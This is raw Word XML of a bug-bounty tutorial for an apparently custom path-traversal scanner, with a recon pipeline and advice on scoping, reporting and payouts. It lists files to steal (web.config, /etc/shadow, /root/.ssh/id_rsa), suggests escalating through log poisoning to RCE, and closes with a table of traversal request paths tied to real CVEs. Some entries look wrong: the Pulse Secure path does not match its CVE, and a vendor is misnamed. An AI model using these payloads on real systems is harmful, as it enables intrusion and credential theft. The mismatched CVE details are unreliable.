                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># C:/inetpub/wwwroot/web.config   — app secrets, connection strings</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># C:/boot.ini                     — system info (older systems)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A5276" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Bug Bounty Pro Tips</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1  Full Bug Bounty Recon Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Before running PathTravScan, do proper recon. The more surface area you find, the more likely you are to find a vulnerable endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate subdomains with subfinder or amass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Resolve all subdomains to IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check which IPs are different from the main CDN/WAF IP (backend servers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Port scan backend IPs: nmap -sV -p 80,443,8080,8443,8888 BACKEND-IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fingerprint technologies: whatweb, wappalyzer, shodan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for known vulnerable software versions (SiteScope, Pulse Secure, etc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for WAF on backend vs frontend — different IPs may have no WAF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run PathTravScan against unprotected backend endpoints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Full recon pipeline example</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">subfinder -d target.com -o subs.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">cat subs.txt | httpx -ip -status-code -o alive.txt</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Find IPs that differ from the main domain's IP (potential backends)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">main_ip=$(dig +short target.com | head -1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">grep -v $main_ip alive.txt &gt; backends.txt</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Run PathTravScan against each backend</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">while read line; do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  url=$(echo $line | awk '{print $1}')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  python pathtravscan.py -u $url -p /app --mode quick</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">done &lt; backends.txt</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4.2  Scope Verification (CRITICAL — Read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pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ WARNING</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="816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pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Scanning out-of-scope targets will get you permanently banned from bug bounty programs and may result in legal action. Always verify scope before testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Before testing ANY target:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Read the entire program policy on HackerOne / Bugcrowd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check which domains/IPs are explicitly IN scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check which are explicitly OUT of scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If you find a backend IP via Shodan — verify it belongs to the target company</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">When in doubt, send an email to the security team asking for clarification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Only test during reasonable hours — avoid mass scanning that could cause downtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3  Writing a High-Quality Bug Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A well-written report gets triaged faster and paid higher. Always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W w:type="dxa" w:w="676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Write</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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Path Traversal on [endpoint] allows reading /etc/passwd — Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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Critical / High / Medium + CVSS score if you can calculate it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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1-2 sentences: what the bug is, where it is, what it exposes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Steps to Reproduce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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Exact curl command or Burp request. Anyone should be able to reproduce it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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Screenshot of response body showing root:x:0: or key content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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What can an attacker do? Read credentials? RCE? Explain the worst case.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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Use a whitelist of allowed file paths. Never pass user input to file APIs.</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4.4  Severity Escalation — How to Maximise Your Bounty</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Path traversal reports get higher payouts when you demonstrate escalated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20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Bounty Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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Escalates It</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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$50–$200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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/etc/hostname, /etc/os-release only — no sensitive data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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$200–$500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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/etc/passwd readable — user list exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7"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$500–$2000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7"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/etc/shadow or private keys or .env with DB passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200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$2000–$20000+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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LFI → RCE via log poisoning, or private SSH key + server access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BB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EAFAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">💰 TIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EAFAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Read /root/.ssh/id_rsa if possible. A private SSH key with the ability to log in as root turns a High into a Critical immediately.</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4.5  Known Vulnerable Software to Target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">These products have had real path traversal CVEs. If you see them in scope, prioritise testing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Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="436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Vulnerable Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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HP SiteScope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CVE-2012-3261</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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/SiteScope/htdocs/artwork/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Pulse Secure VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CVE-2019-11510</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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/api/v1/totp/user-backup-code/../../../</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Citrix ADC/Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CVE-2019-19781</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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/vpn/../vpns/cfg/smb.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Apache HTTP Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CVE-2021-41773</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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/cgi-bin/.%2e/%2e%2e/bin/sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Netlogic/Fortinet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CVE-2018-13379</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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/remote/fgt_lang?lang=/../../../../</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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ManageEngine</w:t>
            </w:r>
          </w:p>
        </w:tc>
